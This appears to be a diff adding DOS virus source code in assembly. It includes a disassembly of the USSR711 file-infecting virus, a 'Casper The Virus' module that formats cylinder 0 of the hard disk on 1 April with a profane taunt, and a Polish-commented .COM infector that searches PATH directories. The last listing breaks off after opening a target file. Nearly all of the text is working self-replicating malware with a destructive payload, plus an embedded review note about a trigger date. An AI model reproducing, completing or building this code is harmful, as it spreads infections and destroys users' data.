; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_4 proc near
|
||||
call sub_5
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_5:
|
||||
pop bx
|
||||
retn
|
||||
sub_4 endp
|
||||
|
||||
push bx
|
||||
mov bh,4Bh ; 'K'
|
||||
cmp bh,ah
|
||||
je loc_11 ; Jump if equal
|
||||
pop bx
|
||||
loc_10:
|
||||
;* jmp far ptr loc_1
|
||||
db 0EAh, 93h, 17h, 26h, 0Dh
|
||||
loc_11:
|
||||
cmp al,0FFh
|
||||
jne loc_12 ; Jump if not equal
|
||||
pop bx
|
||||
mov bl,0FFh
|
||||
iret ; Interrupt return
|
||||
pushf ; Push flags
|
||||
;* call far ptr sub_1
|
||||
db 9Ah, 00h, 00h, 00h, 00h
|
||||
push ax
|
||||
in al,61h ; port 61h, 8255 port B, read
|
||||
xor al,3
|
||||
out 61h,al ; port 61h, 8255 B - spkr, etc
|
||||
mov al,0B6h
|
||||
out 43h,al ; port 43h, 8253 wrt timr mode
|
||||
mov ax,bx
|
||||
out 42h,al ; port 42h, 8253 timer 2 spkr
|
||||
mov al,ah
|
||||
out 42h,al ; port 42h, 8253 timer 2 spkr
|
||||
pop ax
|
||||
iret ; Interrupt return
|
||||
loc_12:
|
||||
push ax
|
||||
push cx
|
||||
push dx
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
mov bx,dx
|
||||
xor di,di ; Zero register
|
||||
loc_13:
|
||||
inc di
|
||||
cmp byte ptr [bx+di],0
|
||||
jne loc_13 ; Jump if not equal
|
||||
cmp word ptr [bx+di-2],4D4Fh
|
||||
je loc_14 ; Jump if equal
|
||||
jmp loc_26
|
||||
loc_14:
|
||||
cmp byte ptr [bx+di-3],43h ; 'C'
|
||||
je loc_15 ; Jump if equal
|
||||
jmp loc_26
|
||||
loc_15:
|
||||
call sub_2
|
||||
mov bx,di
|
||||
add bx,1Ah
|
||||
mov ax,70h
|
||||
mov es,ax
|
||||
xor di,di ; Zero register
|
||||
loc_16:
|
||||
inc di
|
||||
cmp di,0FFFFh
|
||||
jbe loc_17 ; Jump if below or =
|
||||
jmp loc_26
|
||||
loc_17:
|
||||
xor si,si ; Zero register
|
||||
loc_18:
|
||||
mov ah,es:[di]
|
||||
cmp ah,cs:[bx+si]
|
||||
jne loc_16 ; Jump if not equal
|
||||
inc si
|
||||
inc di
|
||||
cmp si,5
|
||||
jne loc_18 ; Jump if not equal
|
||||
sub di,5
|
||||
xor ax,ax ; Zero register
|
||||
mov es,ax
|
||||
push word ptr es:data_3e
|
||||
push word ptr es:data_4e
|
||||
cli ; Disable interrupts
|
||||
mov es:data_3e,di
|
||||
mov word ptr es:data_4e,70h
|
||||
sti ; Enable interrupts
|
||||
call sub_2
|
||||
mov bx,dx
|
||||
xor cx,cx ; Zero register
|
||||
mov ah,4Eh ; 'N'
|
||||
call sub_6
|
||||
jnc loc_19 ; Jump if carry=0
|
||||
jmp loc_25
|
||||
loc_19:
|
||||
mov ah,2Fh ; '/'
|
||||
call sub_6
|
||||
mov ax,es:[bx+1Ah]
|
||||
cmp ax,0F000h
|
||||
jbe loc_20 ; Jump if below or =
|
||||
jmp loc_25
|
||||
loc_20:
|
||||
push ds
|
||||
push dx
|
||||
push word ptr es:[bx+15h]
|
||||
push word ptr es:[bx+16h]
|
||||
push word ptr es:[bx+18h]
|
||||
add ax,100h
|
||||
mov cs:[di+18h],ax
|
||||
mov ax,4301h
|
||||
mov cx,20h
|
||||
call sub_6
|
||||
mov ax,3D02h
|
||||
call sub_6
|
||||
jnc loc_21 ; Jump if carry=0
|
||||
jmp short loc_24
|
||||
nop
|
||||
loc_21:
|
||||
push cs
|
||||
pop ds
|
||||
mov bx,ax
|
||||
mov ah,3Fh ; '?'
|
||||
mov cx,5
|
||||
mov dx,di
|
||||
add dx,21h
|
||||
call sub_6
|
||||
mov ax,[di+18h]
|
||||
sub ax,[di+22h]
|
||||
cmp ax,2C3h
|
||||
jne loc_23 ; Jump if not equal
|
||||
cmp byte ptr [di+20h],1Eh
|
||||
jae loc_22 ; Jump if above or =
|
||||
inc byte ptr [di+20h]
|
||||
loc_22:
|
||||
jmp short loc_24
|
||||
nop
|
||||
loc_23:
|
||||
mov byte ptr [di+17h],0B8h
|
||||
mov ax,4200h
|
||||
xor cx,cx ; Zero register
|
||||
xor dx,dx ; Zero register
|
||||
call sub_6
|
||||
mov ah,40h ; '@'
|
||||
mov cx,3
|
||||
mov dx,di
|
||||
add dx,17h
|
||||
call sub_6
|
||||
mov ah,40h ; '@'
|
||||
mov cx,2
|
||||
mov word ptr [di+17h],0C350h
|
||||
call sub_6
|
||||
mov ax,4202h
|
||||
xor cx,cx ; Zero register
|
||||
xor dx,dx ; Zero register
|
||||
call sub_6
|
||||
mov ah,40h ; '@'
|
||||
call sub_7
|
||||
mov cx,si
|
||||
sub cx,di
|
||||
mov dx,di
|
||||
call sub_6
|
||||
loc_24:
|
||||
mov ax,5701h
|
||||
pop dx
|
||||
pop cx
|
||||
call sub_6
|
||||
mov ax,4301h
|
||||
pop cx
|
||||
mov ch,0
|
||||
pop dx
|
||||
pop ds
|
||||
call sub_6
|
||||
mov ah,3Eh ; '>'
|
||||
call sub_6
|
||||
loc_25:
|
||||
xor ax,ax ; Zero register
|
||||
mov es,ax
|
||||
cli ; Disable interrupts
|
||||
pop word ptr es:data_4e
|
||||
pop word ptr es:data_3e
|
||||
sti ; Enable interrupts
|
||||
loc_26:
|
||||
call sub_2
|
||||
cmp byte ptr cs:[di+1Fh],0
|
||||
jne loc_27 ; Jump if not equal
|
||||
cmp byte ptr cs:[di+20h],1Eh
|
||||
jb loc_27 ; Jump if below
|
||||
mov byte ptr cs:[di+1Fh],1
|
||||
xor ax,ax ; Zero register
|
||||
mov es,ax
|
||||
call sub_4
|
||||
add bx,17h
|
||||
mov ax,es:data_1e
|
||||
mov cx,es:data_2e
|
||||
mov cs:[bx+2],ax
|
||||
mov cs:[bx+4],cx
|
||||
cli ; Disable interrupts
|
||||
mov es:data_1e,bx
|
||||
mov es:data_2e,cs
|
||||
sti ; Enable interrupts
|
||||
loc_27:
|
||||
pop es
|
||||
pop ds
|
||||
pop di
|
||||
pop dx
|
||||
pop cx
|
||||
pop ax
|
||||
pop bx
|
||||
jmp loc_10
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_6 proc near
|
||||
pushf ; Push flags
|
||||
call dword ptr cs:[di+0Bh]
|
||||
retn
|
||||
sub_6 endp
|
||||
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_7 proc near
|
||||
call sub_8
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_8:
|
||||
pop si
|
||||
add si,5
|
||||
retn
|
||||
sub_7 endp
|
||||
|
||||
|
||||
seg_a ends
|
||||
|
||||
|
||||
|
||||
end start
|
|
@ -0,0 +1,384 @@
|
|||
|
||||
PAGE 59,132
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ USSR711 ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Created: 9-Feb-92 ÛÛ
|
||||
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
data_1e equ 20h
|
||||
data_2e equ 22h
|
||||
data_3e equ 4Ch
|
||||
data_4e equ 4Eh
|
||||
data_5e equ 84h
|
||||
data_6e equ 86h
|
||||
data_7e equ 0D9h
|
||||
data_8e equ 0DBh
|
||||
data_9e equ 122h
|
||||
data_10e equ 124h
|
||||
data_11e equ 13Ah
|
||||
data_12e equ 13Ch
|
||||
data_13e equ 441h
|
||||
data_14e equ 3
|
||||
data_15e equ 12h
|
||||
data_16e equ 0
|
||||
data_17e equ 0B0h
|
||||
data_18e equ 0B2h
|
||||
|
||||
seg_a segment byte public
|
||||
assume cs:seg_a, ds:seg_a
|
||||
|
||||
|
||||
org 100h
|
||||
|
||||
ussr711 proc far
|
||||
|
||||
start:
|
||||
jmp loc_1
|
||||
int 21h ; DOS Services ah=function 00h
|
||||
; terminate, cs=progm seg prefx
|
||||
call sub_1
|
||||
|
||||
ussr711 endp
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_1 proc near
|
||||
pop bx
|
||||
xor di,di ; Zero register
|
||||
mov si,bx
|
||||
sub si,3
|
||||
mov ax,4B04h
|
||||
int 21h ; ??INT Non-standard interrupt
|
||||
cmp ax,44Bh
|
||||
loc_1:
|
||||
call sub_2
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_2:
|
||||
pop bx
|
||||
xor di,di ; Zero register
|
||||
mov si,bx
|
||||
sub si,3
|
||||
mov ax,4B04h
|
||||
int 21h ; ??INT Non-standard interrupt
|
||||
cmp ax,44Bh
|
||||
je $+7Dh ; Jump if equal
|
||||
mov ax,es
|
||||
dec ax
|
||||
mov es,ax
|
||||
mov ax,es:data_14e
|
||||
sub ax,2Ch
|
||||
mov es:data_14e,ax
|
||||
sub word ptr es:data_15e,2Ch
|
||||
nop
|
||||
mov es,es:data_15e
|
||||
mov cx,2BBh
|
||||
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
|
||||
cli ; Disable interrupts
|
||||
xor ax,ax ; Zero register
|
||||
mov ds,ax
|
||||
mov cx,ds:data_5e
|
||||
mov es:data_11e,cx
|
||||
mov cx,ds:data_6e
|
||||
mov es:data_12e,cx
|
||||
mov word ptr ds:data_5e,126h
|
||||
mov ds:data_6e,es
|
||||
mov cx,ds:data_1e
|
||||
mov es:data_7e,cx
|
||||
mov cx,ds:data_2e
|
||||
mov es:data_8e,cx
|
||||
mov word ptr ds:data_1e,0B4h
|
||||
mov ds:data_2e,es
|
||||
mov cx,ds:data_3e
|
||||
mov es:data_9e,cx
|
||||
mov cx,ds:data_4e
|
||||
mov es:data_10e,cx
|
||||
mov word ptr ds:data_3e,0DDh
|
||||
mov ds:data_4e,es
|
||||
sti ; Enable interrupts
|
||||
mov di,100h
|
||||
mov si,bx
|
||||
add si,2B3h
|
||||
mov cx,3
|
||||
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
|
||||
mov ax,cs
|
||||
mov es,ax
|
||||
mov ds,ax
|
||||
xor ax,ax ; Zero register
|
||||
mov si,ax
|
||||
mov di,0
|
||||
mov bx,offset start
|
||||
jmp bx ; Register jump
|
||||
add bl,[si]
|
||||
db 67h, 6Fh, 50h, 2Eh,0A1h,0B2h
|
||||
db 00h, 40h, 2Eh,0A3h,0B2h, 00h
|
||||
db 2Eh,0A1h,0B0h, 00h, 3Dh, 00h
|
||||
db 00h, 75h, 10h, 2Eh, 81h, 3Eh
|
||||
db 0B2h, 00h, 74h, 37h, 75h, 07h
|
||||
db 0B8h, 02h, 1Ch, 2Eh,0A3h,0B0h
|
||||
db 00h
|
||||
db 58h,0EAh, 0Ah, 01h, 49h,0D7h
|
||||
db 2Eh, 83h, 3Eh,0B0h, 00h, 00h
|
||||
db 74h, 3Ch, 80h,0FCh, 03h, 74h
|
||||
db 05h, 80h,0FCh, 0Bh
|
||||
db 75h, 32h
|
||||
loc_3:
|
||||
test dl,80h
|
||||
js loc_4 ; Jump if sign=1
|
||||
push ax
|
||||
mov ax,cs:data_18e
|
||||
and ax,3
|
||||
pop ax
|
||||
jnz loc_4 ; Jump if not zero
|
||||
push bp
|
||||
add [bp+si+7Dh],dh
|
||||
push ax
|
||||
mov ax,cs
|
||||
mov ds,ax
|
||||
mov ax,[bp+6]
|
||||
push ax
|
||||
popf ; Pop flags
|
||||
stc ; Set carry flag
|
||||
pushf ; Push flags
|
||||
pop ax
|
||||
mov [bp+6],ax
|
||||
xor ax,ax ; Zero register
|
||||
mov ds,ax
|
||||
pop ax
|
||||
mov ah,80h
|
||||
mov ds:data_13e,ah
|
||||
pop ds
|
||||
pop bp
|
||||
iret ; Interrupt return
|
||||
loc_4:
|
||||
;* jmp far ptr loc_20
|
||||
sub_1 endp
|
||||
|
||||
db 0EAh, 49h, 01h, 08h,0D7h
|
||||
cmp ax,4B04h
|
||||
jne loc_5 ; Jump if not equal
|
||||
mov ax,44Bh
|
||||
iret ; Interrupt return
|
||||
loc_5:
|
||||
cmp ax,4B00h
|
||||
je loc_7 ; Jump if equal
|
||||
cmp ax,4B03h
|
||||
je loc_7 ; Jump if equal
|
||||
loc_6:
|
||||
;* jmp far ptr loc_19
|
||||
db 0EAh,0B5h, 02h, 46h,0D5h
|
||||
loc_7:
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push ds
|
||||
push es
|
||||
push si
|
||||
push di
|
||||
mov ax,ds
|
||||
mov es,ax
|
||||
cld ; Clear direction
|
||||
mov al,0
|
||||
mov di,dx
|
||||
mov cx,0C8h
|
||||
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
|
||||
jnz loc_8 ; Jump if not zero
|
||||
std ; Set direction flag
|
||||
mov al,2Eh ; '.'
|
||||
mov cx,0Ah
|
||||
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
|
||||
loc_8:
|
||||
jnz loc_11 ; Jump if not zero
|
||||
inc di
|
||||
inc di
|
||||
mov al,[di]
|
||||
and al,0DFh
|
||||
cmp al,43h ; 'C'
|
||||
jne loc_11 ; Jump if not equal
|
||||
mov al,[di+1]
|
||||
and al,0DFh
|
||||
cmp al,4Fh ; 'O'
|
||||
jne loc_11 ; Jump if not equal
|
||||
mov al,[di+2]
|
||||
and al,0DFh
|
||||
cmp al,4Dh ; 'M'
|
||||
jne loc_11 ; Jump if not equal
|
||||
mov al,[di-2]
|
||||
and al,0DFh
|
||||
cmp al,44h ; 'D'
|
||||
jne loc_9 ; Jump if not equal
|
||||
mov al,[di-8]
|
||||
and al,0DFh
|
||||
cmp al,43h ; 'C'
|
||||
je loc_11 ; Jump if equal
|
||||
loc_9:
|
||||
mov ax,4300h
|
||||
int 21h ; DOS Services ah=function 43h
|
||||
; get attrb cx, filename @ds:dx
|
||||
mov word ptr cs:[2B4h],cx
|
||||
mov cx,20h
|
||||
mov ax,4301h
|
||||
int 21h ; DOS Services ah=function 43h
|
||||
; set attrb cx, filename @ds:dx
|
||||
jc loc_11 ; Jump if carry Set
|
||||
mov word ptr cs:[2B0h],ds
|
||||
mov word ptr cs:[2B2h],dx
|
||||
mov ax,3D02h
|
||||
int 21h ; DOS Services ah=function 3Dh
|
||||
; open file, al=mode,name@ds:dx
|
||||
jc loc_11 ; Jump if carry Set
|
||||
mov bx,ax
|
||||
mov ax,5700h
|
||||
int 21h ; DOS Services ah=function 57h
|
||||
; get file date+time, bx=handle
|
||||
; returns cx=time, dx=time
|
||||
mov word ptr cs:[2ACh],cx
|
||||
mov word ptr cs:[2AEh],dx
|
||||
jmp short loc_12
|
||||
nop
|
||||
loc_10:
|
||||
jmp loc_6
|
||||
loc_11:
|
||||
jmp loc_16
|
||||
loc_12:
|
||||
mov cx,3
|
||||
mov ax,cs
|
||||
mov ds,ax
|
||||
mov es,ax
|
||||
mov dx,2B6h
|
||||
mov ax,3F00h
|
||||
int 21h ; DOS Services ah=function 3Fh
|
||||
; read file, bx=file handle
|
||||
; cx=bytes to ds:dx buffer
|
||||
mov cx,0
|
||||
mov dx,word ptr cs:[2B7h]
|
||||
add dx,3
|
||||
mov ax,4200h
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, bx=file handle
|
||||
; al=method, cx,dx=offset
|
||||
mov cx,0Ah
|
||||
mov dx,29Bh
|
||||
mov ax,3F00h
|
||||
int 21h ; DOS Services ah=function 3Fh
|
||||
; read file, bx=file handle
|
||||
; cx=bytes to ds:dx buffer
|
||||
cld ; Clear direction
|
||||
mov cx,0Ah
|
||||
mov si,29Bh
|
||||
mov di,data_16e
|
||||
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
|
||||
jz loc_15 ; Jump if zero
|
||||
mov ax,4202h
|
||||
xor cx,cx ; Zero register
|
||||
mov dx,cx
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, bx=file handle
|
||||
; al=method, cx,dx=offset
|
||||
cmp ax,6A4h
|
||||
jb loc_15 ; Jump if below
|
||||
jmp short loc_14
|
||||
nop
|
||||
loc_13:
|
||||
jmp short loc_10
|
||||
loc_14:
|
||||
mov cx,cs:data_18e
|
||||
and cx,0Fh
|
||||
add cx,5
|
||||
mov ax,cs
|
||||
mov ds,ax
|
||||
xor dx,dx ; Zero register
|
||||
mov ax,4000h
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file bx=file handle
|
||||
; cx=bytes from ds:dx buffer
|
||||
jc loc_15 ; Jump if carry Set
|
||||
mov ax,4202h
|
||||
xor cx,cx ; Zero register
|
||||
mov dx,cx
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, bx=file handle
|
||||
; al=method, cx,dx=offset
|
||||
sub ax,3
|
||||
mov word ptr cs:[2AAh],ax
|
||||
xor dx,dx ; Zero register
|
||||
mov ax,4000h
|
||||
mov cx,2BBh
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file bx=file handle
|
||||
; cx=bytes from ds:dx buffer
|
||||
jc loc_15 ; Jump if carry Set
|
||||
mov ax,4200h
|
||||
xor cx,cx ; Zero register
|
||||
mov dx,cx
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, bx=file handle
|
||||
; al=method, cx,dx=offset
|
||||
mov ax,cs
|
||||
mov ds,ax
|
||||
mov dx,2A9h
|
||||
mov ax,4000h
|
||||
mov cx,3
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file bx=file handle
|
||||
; cx=bytes from ds:dx buffer
|
||||
loc_15:
|
||||
mov ax,5701h
|
||||
mov cx,word ptr cs:[2ACh]
|
||||
mov dx,word ptr cs:[2AEh]
|
||||
int 21h ; DOS Services ah=function 57h
|
||||
; set file date+time, bx=handle
|
||||
; cx=time, dx=time
|
||||
mov ax,3E00h
|
||||
int 21h ; DOS Services ah=function 3Eh
|
||||
; close file, bx=file handle
|
||||
mov ds,word ptr cs:[2B0h]
|
||||
mov dx,word ptr cs:[2B2h]
|
||||
mov cx,word ptr cs:[2B4h]
|
||||
mov ax,4301h
|
||||
int 21h ; DOS Services ah=function 43h
|
||||
; set attrb cx, filename @ds:dx
|
||||
loc_16:
|
||||
pop di
|
||||
pop si
|
||||
pop es
|
||||
pop ds
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
jmp short loc_13
|
||||
nop
|
||||
add [bx+si],al
|
||||
push ax
|
||||
mov ah,30h ; '0'
|
||||
int 21h ; DOS Services ah=function 30h
|
||||
; get DOS version number ax
|
||||
cmp ax,1E03h
|
||||
;* je loc_17 ; Jump if equal
|
||||
db 74h, 09h
|
||||
stosb ; Store al to es:[di]
|
||||
stosb ; Store al to es:[di]
|
||||
stosb ; Store al to es:[di]
|
||||
stosb ; Store al to es:[di]
|
||||
;* jmp loc_18
|
||||
db 0E9h, 15h, 00h
|
||||
test ax,3AA5h
|
||||
push ss
|
||||
db 0FEh,0B2h,0B9h, 41h, 20h, 00h
|
||||
db 0B8h, 00h, 4Ch, 02h, 00h
|
||||
|
||||
seg_a ends
|
||||
|
||||
|
||||
|
||||
end start
|
|
@ -0,0 +1,33 @@
|
|||
;****************************************************************************
|
||||
;*
|
||||
;* UTILITY.ASM - Manipulation Task Code For Casper The Virus. *
|
||||
;* *
|
||||
;* USAGE: Is automatically INCLUDED in the assembly of casper.asm *
|
||||
;* *
|
||||
;* DETAILS: Date Activated Hard Disk Destroyer. *
|
||||
;* DATE: 1st April DAMAGE: Formats Cylinder 0 of HD. *
|
||||
;* *
|
||||
;**************************************************************************
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
mov ah,2ah ; DOS Get Date.
|
||||
int 21h
|
||||
cmp dx,0401h ; 5th May.
|
||||
jne utilend
|
||||
mov ax,0515h ;Format Cylinder, 15 Sectors.
|
||||
mov ch,0 ;Cylinder 0.
|
||||
mov dx,00 ;Head 0, Drive 80h.
|
||||
mov es,dx ;Junk for address marks.
|
||||
mov bx,0 ;Junk....
|
||||
int 13h ;Do It!
|
||||
int 20h ;Exit
|
||||
utilend: jmp entry3
|
||||
db "Hi! I'm Casper The Virus, And On April The 1st I'm "
|
||||
db "Gonna Fuck Up Your Hard Disk REAL BAD! "
|
||||
db "In Fact It Might Just Be Impossible To Recover! "
|
||||
db "How's That Grab Ya! <GRIN>"
|
||||
entry3:
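Review bot: The comment on `cmp dx,0401h` (`; 5th May.`) contradicts both the code and the file header: INT 21h function 2Ah returns DH=month and DL=day, so 0401h matches 1 April, which is also what the header's `DATE: 1st April` line and the embedded text say. Change it to `cmp dx,0401h ; 1st April (DH=month 04, DL=day 01).` so an analyst reading the comment alone does not record the wrong trigger date. The `utilend: jmp entry3` target is defined only at the very end of this fragment, after the `db` strings; the USAGE line should state that `entry3` is the continuation point expected by the including file.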
|
||||
|
|
@ -0,0 +1,324 @@
|
|||
; Kod ¦r˘d’owy wirusa nieznanego autorstwa. Widoczne s† silne wp’ywy 648.
|
||||
; Dodano w’asne komentarze wskazuj†ce na r˘§nice mi‘dzy t† wersj† i orygina’em.
|
||||
; Komentarze te poprzedzane s† znakami AK:.
|
||||
; Tekst znaleziony na dysku komputera FIDO w PC Kurierze 28 wrzežnia 1990.
|
||||
|
||||
comment ;
|
||||
**********************************************************
|
||||
wszystkie adresy w programie sa uzywane jako wzgledne
|
||||
do rejestru si ,nie mozna urzywac adresow bezwzglednych
|
||||
jako offset poniewaz po 'doklejeniu sie do programu
|
||||
moze on byc w roznych miejscach
|
||||
**********************************************************
|
||||
;
|
||||
adr_baz equ offset stare_DTA ;adres bazowy poczatku zmiennych
|
||||
;w programie wzgledem niego beda
|
||||
;obliczane przesuniecia pol zmiennych
|
||||
start_prg equ 100h ;adres poczatku programu typu .com
|
||||
ofst_rozk equ offset rozkazy - adr_baz ;przsuniecie pola rozkazy
|
||||
get_dta_addr equ 2fh ;funkcja dos pobranie adresu DTA
|
||||
msdos equ 21h
|
||||
write equ 40h
|
||||
wirus_len equ DTA + 43 - start
|
||||
|
||||
code segment byte public 'code'
|
||||
assume cs:code,ds:code,es:code
|
||||
|
||||
org 100h
|
||||
|
||||
st1: jmp short start
|
||||
|
||||
int msdos
|
||||
|
||||
start: mov dx,offset stare_DTA
|
||||
cld ;ustawienie kierunku przesylania
|
||||
mov si,dx ;poczatek zmiennych programu
|
||||
add si,ofst_rozk ;adres pola rozkazy
|
||||
mov di,100h ;adres pod ktorym jest poczatek programu
|
||||
mov cx,3 ;ilosc bajtow do przeslania
|
||||
repz movsb ;odtworzenie starego poczatku
|
||||
|
||||
mov si,dx ;odtworzenie si
|
||||
|
||||
; AK: pomini‘to badanie wersji DOS
|
||||
|
||||
push es ;zachowanie es bo bedzie zmieniane
|
||||
mov ah,get_dta_addr ;pobierz adres DTA
|
||||
int msdos
|
||||
mov [si],bx ;zapamietanie adresu DTA w polu
|
||||
mov [si+2],es ;stare_DTA
|
||||
pop es ;odtworzenie es
|
||||
|
||||
mov dx,5Fh ;adres pola DTA
|
||||
add dx,si
|
||||
mov ah,1Ah ;ustaw adres DTA ds:dx
|
||||
int msdos
|
||||
|
||||
; AK: zmieniona jest kolejnožŤ instrukcji, teraz do przechowania SI u§yto
|
||||
; DX zamiast stosu
|
||||
|
||||
push es ;zachowanie es
|
||||
push si ;zachowaj si
|
||||
add si,1ah ;adres tekstu PATH=
|
||||
mov dx,si
|
||||
mov es,ds:[2Ch] ;adres srodowiska set
|
||||
|
||||
; AK: w oryginale jest to PUSH SI, POP SI
|
||||
|
||||
mov di,0
|
||||
|
||||
szukaj_dalej:
|
||||
mov si,dx
|
||||
lodsb
|
||||
mov cx,8000h ;dlugosc srodowiska
|
||||
repnz scasb ;szukanie litery P
|
||||
mov cx,4 ;dlugosc reszty ATH=
|
||||
|
||||
porownuj:
|
||||
lodsb
|
||||
scasb
|
||||
jnz szukaj_dalej
|
||||
loop porownuj
|
||||
|
||||
pop si ;odtworz rejestry
|
||||
pop es
|
||||
|
||||
mov [si+16h],di ;adres pierwszego bajtu za PATH=
|
||||
mov di,si
|
||||
add di,1Fh ;adres bufora dla nazwy zbioru
|
||||
mov bx,si
|
||||
jmp short dalej
|
||||
|
||||
nast_sciezka:
|
||||
cmp word ptr[si+16h],0 ;czy koniec path
|
||||
jnz l1 ;nie
|
||||
|
||||
jmp exit1 ;zakoncz nie ma wiecej zbiorow
|
||||
|
||||
l1: push ds
|
||||
push si
|
||||
mov ds,es:[2Ch] ;urzywamy es: bo ds bedzie modyfikowany
|
||||
mov di,si
|
||||
mov si,es:[di+16h]
|
||||
add di,1Fh
|
||||
|
||||
next: lodsb ;zaladuj kolejny znak sciezki dostepu
|
||||
cmp al,';' ;czy koniec definicji scierzki
|
||||
jz koniec_sciezki
|
||||
cmp al,0 ;czy koniec lancucha path
|
||||
jz koniec_set
|
||||
stosb ;przepisz znak do bufora
|
||||
jmp short next
|
||||
|
||||
koniec_set:
|
||||
mov si,0
|
||||
koniec_sciezki:
|
||||
pop bx
|
||||
pop ds
|
||||
mov [bx+16h],si ;adres do ktorego przeszukano path
|
||||
cmp byte ptr [di-1],'\' ;czy scierzka zakonczona przez \
|
||||
jz dalej
|
||||
mov al,'\'
|
||||
stosb ;dopisz \
|
||||
|
||||
dalej: mov [bx+18h],di
|
||||
mov si,bx
|
||||
add si,10h
|
||||
mov cx,6
|
||||
repz movsb ;przepisanie *.com \0
|
||||
mov si,bx
|
||||
mov ah,4Eh ;find first
|
||||
mov dx,1Fh
|
||||
add dx,si
|
||||
mov cx,3 ;ukryty tylko do odczytu
|
||||
int msdos
|
||||
jmp short czy_jest
|
||||
|
||||
szuk_nast:
|
||||
mov ah,4Fh ;find next
|
||||
int msdos
|
||||
|
||||
czy_jest:
|
||||
jnc jest
|
||||
|
||||
jmp short nast_sciezka
|
||||
|
||||
jest: mov ax,[si+75h] ;pole zawierajace czas w DTA
|
||||
and al,1Fh ;czy sa 62 sekundy
|
||||
cmp al,1Fh
|
||||
|
||||
jz szuk_nast
|
||||
cmp word ptr [si+79h],0FA00h
|
||||
ja szuk_nast ;jesli zbyt dlugi
|
||||
cmp word ptr [si+79h],10
|
||||
jc szuk_nast
|
||||
|
||||
mov di,[si+18h]
|
||||
push si
|
||||
add si,7Dh
|
||||
kopiuj:
|
||||
lodsb ;kopiuje nazwe zbioru
|
||||
stosb ;nazwa w postaci ASCIIZ
|
||||
cmp al,0 ;czy koniec nazwy
|
||||
jnz kopiuj
|
||||
pop si
|
||||
|
||||
mov ax,4300h ;pobierz atrybuty zbioru
|
||||
mov dx,1Fh
|
||||
add dx,si
|
||||
int msdos
|
||||
mov [si+8],cx ;zapamietanie atrybutow
|
||||
|
||||
mov ax,4301h ;ustaw atrybuty
|
||||
and cx,0FFFEh ;usuwa ewentualne r/o
|
||||
mov dx,1Fh
|
||||
add dx,si
|
||||
int msdos
|
||||
|
||||
mov ax,3D02h ;otwarcie zbioru
|
||||
mov dx,1Fh
|
||||
add dx,si
|
||||
int msdos
|
||||
|
||||
